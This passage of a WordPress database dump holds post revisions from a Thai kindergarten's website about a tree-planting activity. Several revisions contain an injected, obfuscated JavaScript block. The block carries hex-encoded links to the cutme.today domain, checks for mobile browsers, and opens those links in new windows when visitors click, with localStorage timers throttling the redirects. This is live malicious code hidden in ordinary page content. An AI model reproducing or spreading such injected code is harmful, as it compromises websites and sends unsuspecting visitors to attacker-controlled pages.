_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:40:16','2024-08-30 03:40:16','',306,'http://watprato.ssk.in.th/?p=324',0,'revision','',0),
(325,2,'2024-08-30 10:42:01','2024-08-30 03:42:01','<!-- wp:generateblocks/container {\"uniqueId\":\"942fbcb5\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":319,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-1-724x1024.jpg\" alt=\"\" class=\"wp-image-319\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','อนุบาลวัดพระโตร่วมใจปลูกต้นไม้ กิจกรรมเฉลิมพระเกียรติ','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:42:01','2024-08-30 03:42:01','',306,'http://watprato.ssk.in.th/?p=325',0,'revision','',0),
(326,2,'2024-08-30 10:42:39','2024-08-30 03:42:39','<!-- wp:generateblocks/container {\"uniqueId\":\"942fbcb5\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":319,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-1-724x1024.jpg\" alt=\"\" class=\"wp-image-319\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโตร่วมใจปลูกต้นไม้ กิจกรรมเฉลิมพระเกียรติ','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:42:39','2024-08-30 03:42:39','',306,'http://watprato.ssk.in.th/?p=326',0,'revision','',0),
(328,2,'2024-08-30 10:44:06','2024-08-30 03:44:06','','messageImage_1724923827910','','inherit','open','closed','','messageimage_1724923827910','','','2024-08-30 10:44:06','2024-08-30 03:44:06','',0,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/messageImage_1724923827910.jpg',0,'attachment','image/jpeg',0),
(336,2,'2024-08-30 13:33:59','2024-08-30 06:33:59','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image 